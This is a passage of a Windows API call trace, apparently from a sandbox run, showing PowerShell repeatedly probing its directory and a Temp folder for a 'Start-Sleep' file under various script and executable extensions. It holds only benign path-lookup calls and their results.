lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.447] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.COM", lpFilePart=0x0) returned 0x3a [0264.447] GetFullPathNameW (in: lpFileName="Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpFilePart=0x0) returned 0x34 [0264.447] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.448] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.448] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.COM", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x3a [0264.449] GetFullPathNameW (in: lpFileName="Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x34 [0264.449] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.449] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.450] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.EXE", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.451] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.451] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x3a [0264.451] GetFullPathNameW (in: lpFileName="Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x34 [0264.451] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.451] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.452] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.BAT", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.452] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x3a [0264.453] GetFullPathNameW (in: lpFileName="Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x34 [0264.453] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.453] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.454] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CMD", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.454] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x3a [0264.454] GetFullPathNameW (in: lpFileName="Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x34 [0264.455] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.455] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.455] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBS", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.480] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x3a [0264.480] GetFullPathNameW (in: lpFileName="Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x34 [0264.480] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.480] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.481] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBE", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.481] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JS", lpFilePart=0x0) returned 0x39 [0264.482] GetFullPathNameW (in: lpFileName="Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpFilePart=0x0) returned 0x33 [0264.482] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.482] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.483] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JS", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.483] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x3a [0264.483] GetFullPathNameW (in: lpFileName="Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x34 [0264.484] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.484] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.484] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JSE", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0264.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.485] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, 